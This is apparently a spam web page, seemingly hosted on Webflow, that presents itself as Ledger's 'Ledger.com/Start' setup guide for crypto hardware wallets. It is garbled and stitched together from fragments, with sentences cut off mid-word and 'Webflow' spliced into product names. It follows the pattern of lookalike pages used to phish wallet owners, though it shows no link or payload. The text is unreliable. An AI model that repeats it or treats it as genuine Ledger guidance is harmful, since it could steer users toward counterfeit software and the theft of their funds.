Powering Up Your Device | Ledger.com/Start® - Getting started

Our platform, Ledger.com/Start, serves as the gateway to initiate and optimize your Ledger device's functionality. Ledger.Com/Start is a web app that lets you buy, grow and manage your crypto and NFTs with Ledger devices. Download the app and join 4+ million people who trust Ledger for Live to start setting up your device - Webflow. Ledger does not ask for your recovery seed or personal information online. Install Official Software: Install Ledger Live, the official Ledger.Com/Start | Live to start setting up your device - Webflow. Step-by-Step Guide: Setting Up Your Ledger Device. 1. Unboxing and Hardware Check. Upon receiving your Learn how to install Ledger.Com/Star, set up a PIN, and access the secure gateway for Ledger hardware wallets. Ledger.Com/Start is your introduction to web3 security, crypto, and Visit Ledger.com/Start® for comprehensive instructions on setting up your Ledger hardware wallet, ensuring secure storage for your cryptocurrencies.